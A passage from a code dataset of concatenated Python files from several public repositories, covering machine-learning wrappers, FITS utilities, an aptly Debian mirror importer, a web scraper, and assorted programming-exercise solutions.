print(\"\\n===================\")\n print(\"= End of results. =\")\n print(\"===================\\n\")\n\n def _output_regressor_results(self):\n \"\"\"Outputs model metrics after run_regressor() finishes.\"\"\"\n print(\"\\n=================================\")\n print(\"= RandomForestRegressor Results =\")\n print(\"=================================\\n\")\n\n print(\"{:<20} {:<20}\".format(\"Mean Squared Error:\",\n self.mean_squared_error))\n print(\"\\n{:<20} {:<20}\".format(\"R2 Score:\", self.r2_score))\n print(\"\\n{:<20} {:<20}\".format(\"R Score:\", str(self.r_score)))\n print(\"\\nCross Validation Scores:\", self.cross_val_scores_regressor)\n print(\"\\nFeature Importances:\", self.feature_importances_regressor)\n\n if self.gridsearch:\n print(\"\\n{:<20} {:<20}\".format(\"GridSearch Score:\",\n self.gs_result))\n\n print(\"\\n\\nCall predict_regressor() to make predictions for new data.\")\n\n print(\"\\n===================\")\n print(\"= End of results. =\")\n print(\"===================\\n\")\n\n def _run_gridsearch(self, classifier):\n \"\"\"Runs GridSearch with the parameters given in run_classifier()\n or run_regressor(). Returns the best parameters.\"\"\"\n dataset_X_train, dataset_X_test, dataset_y_train, dataset_y_test = \\\n train_test_split(self.attributes, self.labels,\n test_size=self.test_size)\n if classifier:\n acc_scorer = make_scorer(accuracy_score)\n clf = RandomForestClassifier()\n\n # Run GridSearch\n grid_obj = GridSearchCV(clf, self.gs_params, scoring=acc_scorer)\n grid_obj = grid_obj.fit(dataset_X_train, dataset_y_train)\n\n # Set the clf to the best combination of parameters\n clf = grid_obj.best_estimator_\n\n # Fit the best algorithm to the data\n clf.fit(dataset_X_train, dataset_y_train)\n predictions = clf.predict(dataset_X_test)\n self.gs_result = accuracy_score(dataset_y_test, predictions)\n else:\n clf = RandomForestRegressor()\n\n # Run GridSearch\n grid_obj = GridSearchCV(clf, self.gs_params, scoring=\"r2\")\n grid_obj = grid_obj.fit(dataset_X_train, dataset_y_train)\n\n # Set the clf to the best combination of parameters\n clf = grid_obj.best_estimator_\n\n # Fit the best algorithm to the data\n clf.fit(dataset_X_train, dataset_y_train)\n predictions = clf.predict(dataset_X_test)\n self.gs_result = clf.score(dataset_X_test, dataset_y_test)\n\n # Return the best parameters\n print(\"\\nBest GridSearch Parameters:\\n\", grid_obj.best_params_, \"\\n\")\n return grid_obj.best_params_\n\n def _check_inputs(self):\n \"\"\"Verifies if instance data is ready for use in RandomForest\n models.\n \"\"\"\n # Check if attributes exists\n if self.attributes is None:\n print(\"attributes is missing; call set_attributes(new_attributes)\",\n \"to fix this! new_attributes should be a populated numpy\",\n \"array of your independent variables.\")\n return False\n\n # Check if labels exists\n if self.labels is None:\n print(\"labels is missing; call set_labels(new_labels) to fix this!\",\n \"new_labels should be a populated dataset of classes (for\",\n \"classification) or dependent variables (for regression).\")\n return False\n\n # Check if attributes and labels have same number of rows (samples)\n if self.attributes.shape[0] != self.labels.shape[0]:\n print(\"attributes and labels don't have the same number of rows.\",\n \"Make sure the number of samples in each dataset matches!\")\n return False\n\n return True\n","repo_name":"BaratiLab/ManufacturingNet","sub_path":"ManufacturingNet/models/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":45062,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"19401050315","text":"# Bojan Nikolic\n# $Id: bnfitsutils.py,v 1.4 2006/04/03 10:47:06 bnikolic Exp $\n#\n# FITS file utilities exploting pybnfits\n\nimport os\n\nimport numpy\nimport pyfits\n\nimport pybnfits\n\n\ndef MaskToList(mask):\n\n \"Turn a mask into a list of rows to delete\"\n\n mask = numpy.array( mask, numpy.bool)\n mask = numpy.logical_not(mask)\n xr=numpy.arange( len(mask) )[mask]\n xr=numpy.array(xr)\n\n res=pybnfits.LongVector(len(xr))\n for i,v in enumerate(xr):\n res[i]=v+1\n return res\n\ndef Select(fname,\n mask):\n\n \"Remove all rows for which mask isn't true\"\n\n rowlist=MaskToList(mask)\n\n fin=pybnfits.FitsF( fname, pybnfits.FitsF.readwrite)\n\n fin.HDUseek(2)\n\n pybnfits.DeleteRows(fin, rowlist)\n\ndef Cat(fnameinlist,\n fnameout):\n\n \"Concatenate fits files\"\n\n finlist= [ pybnfits.FitsF( fname, pybnfits.FitsF.read) for fname in fnameinlist]\n\n nrowstotal= sum([ pybnfits.NRows(f, 2) for f in finlist ])\n\n fout = pybnfits.FitsF( fnameout, pybnfits.FitsF.create)\n fout.CreateTbl(nrowstotal, \"\")\n fout.HDUseek(2)\n\n # copy first table:\n ncols=len(pyfits.open(fnameinlist[0])[1].data.names)\n cr =1\n finlist[0].HDUseek(2)\n for i in range(ncols):\n pybnfits.CopyCol(finlist[0],\n fout ,\n i+1 ,\n i+1 ,\n True )\n cr += pybnfits.NRows(finlist[0],2)\n\n # copy the data from other files\n \n for fin in finlist[1:]:\n fin.HDUseek(2)\n for i in range(ncols):\n pybnfits.CopyColData(fin,\n fout ,\n i+1 ,\n i+1 ,\n cr )\n cr += pybnfits.NRows(fin,2)\n\n\n\n \n \n \n\n\n","repo_name":"bnikolic/oof","sub_path":"bnfits/pybind/bin/bnfitsutils.py","file_name":"bnfitsutils.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"36338705261","text":"import argparse\nfrom collections import defaultdict\nfrom enum import Enum\nfrom pathlib import Path\nfrom os import path\nfrom subprocess import check_output, PIPE, run, CalledProcessError\nfrom sys import stderr, exit\nimport re\nimport time\nimport yaml\n\n\nclass Reprepro2AptlyFilter():\n def convert(self, filter_str):\n # remove begin/end whitespaces\n r_str = filter_str.strip()\n # Package is not a valid Aptly filter. Could be Name or empty.\n r_str = r_str.replace('Package', 'Name')\n # Aptly filters use (= value) for exact matches rather than (% =value)\n r_str = r_str.replace('% =', '= ')\n return r_str\n\n\nclass Aptly():\n class ArtifactType(Enum):\n MIRROR = 'mirror'\n REPOSITORY = 'repo'\n SNAPSHOT = 'snapshot'\n PUBLISH = 'publish'\n\n def __init__(self, debug=False, config_file=None):\n self.debug = debug\n self.config_file = config_file\n\n def __error(self, cmd, msg, exit_on_errors=False):\n print(f\"Aptly error running: {cmd}\", file=stderr)\n print(f\" --> {msg} \\n\", file=stderr)\n if exit_on_errors:\n exit(1)\n\n def check_valid_filter(self, filter_str):\n fake_mirror_name = '_test_aptly_filter'\n create_mirror_cmd = ['mirror', 'create',\n f\"-filter={filter_str}\",\n fake_mirror_name,\n 'http://deb.debian.org/debian', 'sid', 'main']\n result = self.run(create_mirror_cmd, fail_on_errors=False)\n if not result:\n return result\n delete_mirror_cmd = ['mirror', 'drop', fake_mirror_name]\n self.run(delete_mirror_cmd)\n return True\n\n def exists(self, aptly_type: ArtifactType, name):\n assert(aptly_type != Aptly.ArtifactType.PUBLISH), 'PUBLISH uses exists_publication'\n return self.run([aptly_type.value, 'show', name],\n fail_on_errors=False, show_errors=False)\n\n def exists_all_source_packages(self, aptly_type: ArtifactType, name):\n if not self.exists(aptly_type, name):\n self.__error('exists_all_source_packages method',\n f\"{aptly_type.value} does not exist\")\n return False\n\n packages_by_source = self.get_packages_by_source_package(aptly_type, name)\n source_packages = self.get_source_packages(aptly_type, name)\n\n result = True\n for source in packages_by_source:\n if source not in source_packages:\n print(f\"Source package '{source}' is missing for packages: \"\n f\"{', '.join(packages_by_source[source])}\")\n result = False\n return result\n\n def exists_publication(self, distribution, end_point):\n return self.run(['publish', 'show', distribution, end_point],\n fail_on_errors=False, show_errors=False)\n\n def get_number_of_packages(self, aptly_type: ArtifactType, name):\n output = check_output(f\"aptly {aptly_type.value} show {name}\", shell=True)\n\n for row in output.splitlines():\n if 'Number of packages' in row.decode():\n return int(row.decode().split(':')[1])\n assert(False), \"get_number_of_packages did not found a valid 'Number of packages' line\"\n\n # returns a dictionary with source package as index and deb packages corresponding to\n # that source package as values\n def get_packages_by_source_package(self, aptly_type: ArtifactType, name):\n packages_by_source = defaultdict(set)\n cmd = [aptly_type.value, 'search',\n '-format={{.Package}}::{{.Source}}',\n name,\n '$PackageType (= deb)']\n result = self.run(cmd, return_all_info=True)\n if result.returncode != 0:\n self.__error(cmd, result.stderr.decode('utf-8'), exit_on_errors=True)\n\n for line in result.stdout.splitlines():\n # ignore empty entries with 'no value'\n if 'no value' in line.decode('utf-8'):\n continue\n package, source = line.decode('utf-8').split('::')\n # Source field may include a parenthesized version which we'll ignore for now.\n # e.g. `pcl (1.11.1+dfsg-1)`\n if len(source.split(' ')) > 1:\n source = source.split(' ')[0]\n packages_by_source[source].add(package)\n return packages_by_source\n\n def get_source_packages(self, aptly_type, name):\n result = self.run([aptly_type.value, 'search',\n '-format={{.Package}}',\n name,\n '$PackageType (= source)'],\n return_all_info=True)\n if result.returncode == 0:\n return result.stdout.decode('utf-8').splitlines()\n # handle no source packages scenario\n if 'no results' in result.stderr.decode('utf-8'):\n return []\n else:\n self.__error('get_source_packages method', result.stderr.decode('utf-8'))\n\n def get_snapshots_from_mirror(self, mirror_name):\n result = []\n output = check_output('aptly snapshot list', shell=True)\n for row in output.splitlines():\n if f\"from mirror [{mirror_name}\" in row.decode():\n m = re.findall(r\"\\[(.*)\\]: Snapshot\", row.decode())\n result.append(m[0])\n return result\n\n def run(self, cmd=[], fail_on_errors=True, show_errors=True, return_all_info=False):\n run_cmd = ['aptly']\n if self.config_file:\n run_cmd += [f\"-config={self.config_file}\"]\n run_cmd += cmd\n if self.debug:\n print(f\"RUN {' '.join(run_cmd)}\")\n try:\n r = run(run_cmd, stdout=PIPE, stderr=PIPE)\n except CalledProcessError as e:\n if return_all_info:\n return r\n return False\n # if return_all_info is enabled return result object\n if return_all_info:\n return r\n\n if r.returncode == 0:\n return True\n else:\n if show_errors:\n self.__error(run_cmd, f\"{r.stderr.decode('utf-8')}\", fail_on_errors)\n return False\n\n\nclass UpdaterConfiguration():\n def __init__(self, input_file):\n try:\n self.config = self.__load_config_file(input_file)\n self.reprepro2aptly = Reprepro2AptlyFilter()\n\n self.architectures = self.config['architectures']\n # source was accepted as a valid architecture to indicate that\n # source packages need to be download. It is not a valid arch in aptly\n if 'source' in self.config['architectures']:\n self.architectures = self.config['architectures'].remove('source')\n self.architectures = self.config['architectures']\n self.component = self.config['component']\n self.filter_formula = self.reprepro2aptly.convert(\n self.config['filter_formula'])\n self.method = self.config['method']\n self.name = self.config['name']\n self.suites = self.config['suites']\n except KeyError as e:\n self.__error(f\"{e} key was not found in file {input_file}\")\n\n def __error(self, msg):\n print(f\"Configuration file error: {msg} \\n\", file=stderr)\n exit(2)\n\n def __load_config_file(self, config_file_path):\n fn = Path(config_file_path).absolute()\n try:\n with open(str(fn), 'r') as stream:\n config = yaml.safe_load(stream)\n return config\n except yaml.YAMLError as exc:\n self.__error(f\"yaml parsing error {exc}\")\n except FileNotFoundError as e:\n self.__error(f\"not found {config_file_path}\")\n\n\nclass UpdaterManager():\n def __init__(self, input_file, debug=False,\n aptly_config_file=None, \n ignore_mirror_signature=False,\n only_mirror_creation=False,\n simulate_repo_import=False,\n snapshot_and_publish=False):\n self.aptly = Aptly(debug,\n config_file=aptly_config_file)\n self.config = UpdaterConfiguration(input_file)\n self.debug = debug\n self.ignore_mirror_signature = ignore_mirror_signature\n self.only_mirror_creation = only_mirror_creation\n self.simulate_repo_import = simulate_repo_import\n self.snapshot_and_publish = snapshot_and_publish\n self.snapshot_timestamp = None\n\n def __create_aptly_mirror(self, distribution):\n assert(self.config)\n self.__log(f\"Creating aptly mirror for {distribution}\")\n mirror_name = self.__get_mirror_name(distribution)\n if self.aptly.exists(Aptly.ArtifactType.MIRROR, mirror_name):\n self.__log_ok('Removing existing mirror')\n self.aptly.run(['mirror', 'drop', mirror_name])\n create_cmd = ['mirror', 'create', '-with-sources',\n f\"-architectures={','.join(self.config.architectures)}\",\n f\"-filter={self.config.filter_formula}\"]\n if self.ignore_mirror_signature:\n create_cmd += ['-ignore-signatures']\n create_cmd += [mirror_name,\n self.config.method,\n distribution,\n self.config.component]\n self.aptly.run(create_cmd)\n update_cmd = ['mirror', 'update']\n if self.ignore_mirror_signature:\n update_cmd += ['-ignore-signatures']\n update_cmd += [mirror_name]\n self.aptly.run(update_cmd)\n\n self.__log_ok(f\"mirror {mirror_name} created\")\n\n def __create_aptly_snapshot(self, distribution):\n self.__log('Creating an aptly snapshot from local aptly repository')\n self.aptly.run(['snapshot', 'create', self.__get_snapshot_name(distribution),\n 'from', 'repo', self.__get_repo_name(distribution)])\n self.__log_ok(f\"snapshot {self.__get_snapshot_name(distribution)} created from repo {self.__get_repo_name(distribution)}\")\n\n def __error(self, msg):\n print(f\"Update Manager error: {msg} \\n\", file=stderr)\n exit(1)\n\n def __get_endpoint_name(self, distribution):\n return f\"filesystem:live:ros_bootstrap\"\n\n def __get_mirror_name(self, distribution):\n return f\"{self.config.name}-{distribution}\"\n\n def __get_repo_name(self, distribution):\n return f\"ros_bootstrap-{distribution}\"\n\n def __get_snapshot_name(self, distribution):\n if not self.snapshot_timestamp:\n self.__generate_snapshot_timestamp(distribution)\n return f\"{self.__get_repo_name(distribution)}-{self.snapshot_timestamp}\"\n\n def __generate_snapshot_timestamp(self, distribution):\n self.snapshot_timestamp = f\"{time.time()}\"\n\n def __import__aptly_mirror_to_repo(self, distribution):\n self.__log('Import aptly mirror into local aptly repo')\n repo_name = self.__get_repo_name(distribution)\n # create repository if it does not exist. New distribution probably\n if not self.aptly.exists(Aptly.ArtifactType.REPOSITORY, repo_name):\n self.aptly.run(['repo', 'create', repo_name])\n self.__log_ok(f\"aptly repository {repo_name} was created\")\n import_cmd = ['repo', 'import',\n self.__get_mirror_name(distribution),\n repo_name,\n self.config.filter_formula]\n if self.simulate_repo_import:\n import_cmd.insert(2, '-dry-run')\n\n self.aptly.run(import_cmd)\n self.__log_ok(f\"aptly mirror {self.__get_mirror_name(distribution)} imported to the repo {repo_name}\")\n\n def __log(self, msg):\n print(f\" {msg} \")\n\n def __log_ok(self, msg):\n self.__log(f\" [ok] {msg}\")\n\n def __publish_new_snapshot(self, dist):\n self.__log('Publish the new snapshot')\n if (self.aptly.exists_publication(dist, self.__get_endpoint_name(dist))):\n self.aptly.run(['publish', 'switch',\n dist,\n self.__get_endpoint_name(dist),\n self.__get_snapshot_name(dist)])\n self.__log_ok(f\"publish switch in {self.__get_endpoint_name(dist)} to use {self.__get_snapshot_name(dist)}\")\n\n else:\n self.aptly.run(['publish', 'snapshot',\n f\"-distribution={dist}\",\n self.__get_snapshot_name(dist),\n self.__get_endpoint_name(dist)])\n self.__log_ok(f\"new publication in {self.__get_endpoint_name(dist)} for {self.__get_snapshot_name(dist)}\")\n\n def __remove_all_generated_mirrors(self):\n for dist in self.config.suites:\n mirror_name = self.__get_mirror_name(dist)\n if self.aptly.exists(Aptly.ArtifactType.MIRROR, mirror_name):\n self.aptly.run(['mirror', 'drop', mirror_name])\n\n def run(self):\n self.__log(f\"\\n == [ PROCESSING {self.config.name} ] ==\\n\")\n for dist in self.config.suites:\n # 1. Create aptly mirrors from yaml configuration file\n self.__create_aptly_mirror(dist)\n # 2. Be sure mirror has all source packages\n self.__log(f'Check all source packages exist')\n if not self.aptly.exists_all_source_packages(Aptly.ArtifactType.MIRROR,\n self.__get_mirror_name(dist)):\n self.__remove_all_generated_mirrors()\n self.__error(f'{self.__get_mirror_name(dist)} does not have a source package. Removing generated mirrors')\n self.__log_ok('All source packages exist in the mirror')\n if self.only_mirror_creation:\n return True\n # 2. Import from mirrors to local repositories\n self.__import__aptly_mirror_to_repo(dist)\n if self.simulate_repo_import:\n self.__log_ok(f\"Simulation of the import actions from mirrors to repos finished\")\n exit(0)\n if self.snapshot_and_publish:\n # 3. Create snapshots from repositories\n self.__create_aptly_snapshot(dist)\n # 4. Publish new snapshots\n self.__publish_new_snapshot(dist)\n self.__log(f\"\\n == [ END OF PROCESSING {self.config.name} ] ==\\n\")\n return True\n\n\ndef main():\n \"\"\"\n Usage: python3 aptly_importer.py [parameters] \n \"\"\"\n usage = \"usage: python3 aptly_importer.py [parameters] \"\n parser = argparse.ArgumentParser(usage)\n parser.add_argument('config_file', type=str, default=None)\n parser.add_argument(\"--ignore-signatures\",\n help=\"Ignore mirror signatures when importing\",\n action=\"store_true\")\n parser.add_argument(\"--only-mirror-creation\",\n help=\"Perform only the mirror creation and update. Useful for\"\n \"checking, it does not modify anything in the system\",\n action=\"store_true\")\n\n parser.add_argument('--simulate-repo-import',\n action='store_true',\n help='Perform a dry-run until the point of simulation mirrors import to repositories')\n parser.add_argument('--snapshot-and-publish', action='store_true', help='Create and publish a snapshot of the updated distributions')\n\n args = parser.parse_args()\n\n if not path.exists(args.config_file):\n parser.error(\"Missing input file from %s\" % args.config_file)\n\n manager = UpdaterManager(input_file=args.config_file,\n ignore_mirror_signature=args.ignore_signatures,\n only_mirror_creation=args.only_mirror_creation,\n simulate_repo_import=args.simulate_repo_import,\n snapshot_and_publish=args.snapshot_and_publish)\n manager.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ros-infrastructure/reprepro-updater","sub_path":"scripts/aptly/aptly_importer.py","file_name":"aptly_importer.py","file_ext":"py","file_size_in_byte":16090,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"18972864093","text":"#!/usr/bin/python3\r\n\r\nimport re\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\nfrom requests import get\r\n\r\nspecies_list = []\r\n\r\ndef find_species():\r\n '''\r\n The function retrieves information about organisms from\r\n https://en.wikipedia.org/wiki/List_of_trees_and_shrubs_by_taxonomic_family\r\n '''\r\n url = 'https://en.wikipedia.org/wiki/List_of_trees_and_shrubs_by_taxonomic_family'\r\n page = get(url)\r\n\r\n bs = BeautifulSoup(page.content, 'html.parser')\r\n tree_classes = bs.find_all(\"div\", {\"style\" : \"background: white; border: 1px solid rgb(153, 153, 153); padding: 1em; width: 80%;\"})\r\n\r\n for one_class in tree_classes:\r\n tree_records = one_class.find('tbody')\r\n tree_records = tree_records.find_all('tr')\r\n\r\n for one_record in tree_records:\r\n one_record = re.sub('<.*?>', '', str(one_record))\r\n\r\n if (len(one_record.split('\\n')) > 3) and one_record.split('\\n')[1] != 'Scientific name':\r\n\r\n species_dict = {}\r\n\r\n species_dict['Species'] = one_record.split('\\n')[1]\r\n species_dict['Family'] = one_record.split('\\n')[5]\r\n\r\n species_dict_copy = species_dict.copy()\r\n species_list.append(species_dict_copy)\r\n\r\n print(f'Number of tree species found: {len(species_list)}')\r\n\r\n\r\ndef save_to_json():\r\n '''Saves the results to the species.json file.'''\r\n with open('species.json', 'w', encoding=\"utf8\") as file:\r\n json.dump(species_list , file)\r\n print('Saved in \"species.json\" file.')\r\n\r\nif __name__ == '__main__':\r\n find_species()\r\n save_to_json()\r\n","repo_name":"AdrianGuzniczak/NCBI-web-scraper","sub_path":"get_species.py","file_name":"get_species.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43419877400","text":"#Rufino Salgado\r\n#cs 327-1 Spring 2020\r\n\r\nimport os\r\nfrom collections import defaultdict\r\n\r\n\r\ndef prefix(read):\r\n return read[0:len(read) - 1]\r\n\r\n\r\ndef suffix(read):\r\n return read[1:len(read)]\r\n\r\n\r\ndef prefixes(lst):\r\n prefix_lst = []\r\n for l in lst:\r\n prefix_lst.append(prefix(l))\r\n # print(prefix_lst)\r\n return prefix_lst\r\n\r\n\r\ndef suffixes(lst):\r\n suffix_lst = []\r\n for l in lst:\r\n suffix_lst.append(suffix(l))\r\n # print(suffix_lst)\r\n return suffix_lst\r\n\r\ndef print_dict(d):\r\n k = ''\r\n for key in d.keys():\r\n k = k + ' ['+ key + ' -> '\r\n for v in d[key]:\r\n k = k + v + ','\r\n k = k.rstrip(',')\r\n k += ']'\r\n print(k)\r\n\r\ndef output_dict(dict, output_file):\r\n path = os.environ['PYTHONPATH'] + os.path.sep + 'files' + os.path.sep + output_file\r\n f = open(path, 'w')\r\n for index, key in enumerate(dict.keys()):\r\n pair = key + ' -> '\r\n for value in dict[key]:\r\n pair += value + ','\r\n pair = pair.rstrip(',')\r\n f.write(pair)\r\n if index != len(dict.keys())-1:\r\n f.write('\\n')\r\n f.close()\r\n\r\ndef main():\r\n path = os.environ['PYTHONPATH'] + os.path.sep + 'files' + os.path.sep + 'de_bruijn_from_kmers.txt'\r\n f = open(path, 'r')\r\n lst = f.readlines()\r\n f.close()\r\n\r\n for index, l in enumerate(lst):\r\n lst[index] = l.rstrip('\\n')\r\n\r\n lst.sort()\r\n d = defaultdict(list)\r\n\r\n pfx = prefixes(lst)\r\n sfx = suffixes(lst)\r\n for l in lst:\r\n #print(l)\r\n d[l] = []\r\n\r\n print_dict(d)\r\n for l in lst:\r\n p = prefix(l)\r\n s = suffix(l)\r\n matches = []\r\n for index,kmer in enumerate(pfx):\r\n if s == kmer and kmer not in matches:\r\n matches.append(lst[index])\r\n for m in matches:\r\n d[l].append(m)\r\n\r\n removes = []\r\n for k in d.keys():\r\n if len(d[k]) == 0:\r\n removes.append(k)\r\n for r in removes:\r\n d.pop(r, None)\r\n\r\n print_dict(d)\r\n\r\n output_dict(d,'de_bruijn_from_kmers_output.txt')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n '''\r\ninput\r\nGAGG\r\nCAGG\r\nGGGG\r\nGGGA\r\nCAGG\r\nAGGG\r\nGGAG\r\n['AGGG', 'CAGG', 'CAGG', 'GAGG', 'GGAG', 'GGGA', 'GGGG']\r\n\r\noutput\r\nAGG -> GGG\r\nCAG -> AGG,AGG\r\nGAG -> AGG\r\nGGA -> GAG\r\nGGG -> GGA,GGG\r\n '''","repo_name":"RufinoSalgado21/Rosalind","sub_path":"Rosalind/Third_set/de-bruijn_from-kmers.py","file_name":"de-bruijn_from-kmers.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7233149886","text":"from django.conf.urls.static import static\nfrom django.urls import path\n\nfrom ConstrWebsite import settings\n\nfrom . import views\n\n\napp_name = 'core'\nurlpatterns = [\n path('', views.MainView.as_view()),\n path('fontains/', views.FountainsView.as_view()),\n path('pools/',views.PoolsView.as_view()),\n path('baths/',views.BathView.as_view()),\n path('spa/',views.SPAView.as_view()),\n path('hummum/',views.HummumView.as_view()),\n path('autowat/',views.AutowatView.as_view()),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"Kerovitar/learn","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14737617809","text":"\"\"\"\r\ncodewars.com/kata/551dc350bf4e526099000ae5\r\n\r\nA DJ remixes songs by adding WUB in between each wordself.\r\nHelp Jonny restore songs that have been WUbed\r\n\"\"\"\r\n\r\ndef song_decoder(song):\r\n edited_song = song\r\n x = 0\r\n for char in edited_song:\r\n if edited_song[x : x + 3] == \"WUB\": #Conditional replaces any segments of WUBs with a space\r\n edited_song = \" \".join([edited_song[:x], edited_song[x + 3:]])\r\n x += 1\r\n split_song = edited_song.split() #Allows words to be seperated by only 1 space, no matter the WUBs\r\n non_spaced_words = [word for word in split_song if word != \"\"]\r\n result = \" \".join(non_spaced_words)\r\n return(result)\r\n\r\ntest_song = \"WUBABCWUBWUBBWUBCWUB\"\r\nprint(song_decoder(test_song))\r\n","repo_name":"ryoiwata/galvanize_python_self_assessment","sub_path":"ryo_iwata_python_self_assessment/python_code_wars/dubstep.py","file_name":"dubstep.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11114236156","text":"def and_not_check(\n self, lhs, n, rule, ast, tokens, first, last\n) -> bool:\n jmp = ast[1]\n if jmp.kind.startswith(\"jmp_\"):\n if last == n:\n return True\n jmp_target = jmp[0].attr\n\n if tokens[first].off2int() <= jmp_target < tokens[last].off2int():\n return True\n if rule == (\"and_not\", (\"expr\", \"jmp_false\", \"expr\", \"POP_JUMP_IF_TRUE\")):\n jmp2_target = ast[3].attr\n return jmp_target != jmp2_target\n return jmp_target != tokens[last].off2int()\n return False\n","repo_name":"rocky/python-uncompyle6","sub_path":"uncompyle6/parsers/reducecheck/and_not_check.py","file_name":"and_not_check.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":3383,"dataset":"github-code","pt":"37"} +{"seq_id":"10741216549","text":"\"\"\"\n218. 天际线问题\n城市的天际线是从远处观看该城市中所有建筑物形成的轮廓的外部轮廓。给你所有建筑物的位置和高度,请返回由这些建筑物形成的 天际线 。\n\n每个建筑物的几何信息由数组 buildings 表示,其中三元组 buildings[i] = [lefti, righti, heighti] 表示:\n\nlefti 是第 i 座建筑物左边缘的 x 坐标。\nrighti 是第 i 座建筑物右边缘的 x 坐标。\nheighti 是第 i 座建筑物的高度。\n天际线 应该表示为由 “关键点” 组成的列表,格式 [[x1,y1],[x2,y2],...] ,并按 x 坐标 进行 排序 。\n关键点是水平线段的左端点。列表中最后一个点是最右侧建筑物的终点,y 坐标始终为 0 ,仅用于标记天际线的终点。\n此外,任何两个相邻建筑物之间的地面都应被视为天际线轮廓的一部分。\n\n注意:输出天际线中不得有连续的相同高度的水平线。例如 [...[2 3], [4 5], [7 5], [11 5], [12 7]...] 是不正确的答案;\n三条高度为 5 的线应该在最终输出中合并为一个:[...[2 3], [4 5], [12 7], ...]\n\n示例 1:\n输入:buildings = [[2,9,10],[3,7,15],[5,12,12],[15,20,10],[19,24,8]]\n输出:[[2,10],[3,15],[7,12],[12,0],[15,10],[20,8],[24,0]]\n解释:\n图 A 显示输入的所有建筑物的位置和高度,\n图 B 显示由这些建筑物形成的天际线。图 B 中的红点表示输出列表中的关键点。\n\n示例 2:\n输入:buildings = [[0,2,3],[2,5,3]]\n输出:[[0,3],[5,0]]\n\n提示:\n1 <= buildings.length <= 104\n0 <= lefti < righti <= 231 - 1\n1 <= heighti <= 231 - 1\nbuildings 按 lefti 非递减排序\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/the-skyline-problem\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nimport heapq\nfrom typing import List\nfrom sortedcontainers import SortedList\n\n\nclass Solution:\n # 顺序扫描\n def getSkyline(self, buildings: List[List[int]]) -> List[List[int]]:\n ans = []\n changes = []\n for left, right, height in buildings:\n changes.append((left, -height))\n changes.append((right, height))\n # 按变化的先后排序\n changes.sort()\n # 默认有一个高度为0\n lives = SortedList([0])\n # 上一个建筑最高高度\n prev = 0\n for x, h in changes:\n # 根据h大小加入或删除建筑\n if h < 0:\n lives.add(h)\n else:\n lives.remove(-h)\n # 加入或删除后当前最高高度\n curr = -lives[0]\n # 最高高度发生了变化\n if curr != prev:\n ans.append([x, curr])\n prev = curr\n return ans\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/218.天际线问题.py","file_name":"218.天际线问题.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40952692787","text":"import string\nimport secrets\n\n\ndef gen_key(parts=4, chars_per_part=8):\n items = string.ascii_uppercase + string.digits\n key = []\n for _ in range(parts):\n key.append(''.join(secrets.choice(items) for i in range(chars_per_part)))\n return '-'.join(key)\n\nprint(gen_key())\n","repo_name":"natenka/100-days-of-Python","sub_path":"talkpython-100-days/day009/beginner/bite_044.py","file_name":"bite_044.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"22534717300","text":"def main():\n print(\"This program calculates the total future value\")\n print(\"of a multi-year investment with by describing\")\n print(\"the interest accrued in terms of a nominal rate\")\n print(\"and the number of compounding periods.\")\n\n principal = eval(input(\"Enter the initial principal: \"))\n interestrate = eval(input(\"Enter the interest rate: \"))\n periods = eval(input(\"Enter the number of compounding periods per year: \"))\n years = eval(input(\"Enter the number of years for the investment: \"))\n\n nominalrate = interestrate / periods\n \n for i in range(periods * years):\n principal = principal * (1 + nominalrate)\n\n print(\"The value in \", years ,\"years is:\", principal, sep=\" \")\n\nmain()\n","repo_name":"levietduc0712/Plot_Python","sub_path":"Chap2/Chap2_7.py","file_name":"Chap2_7.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31087599140","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.9.6)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = 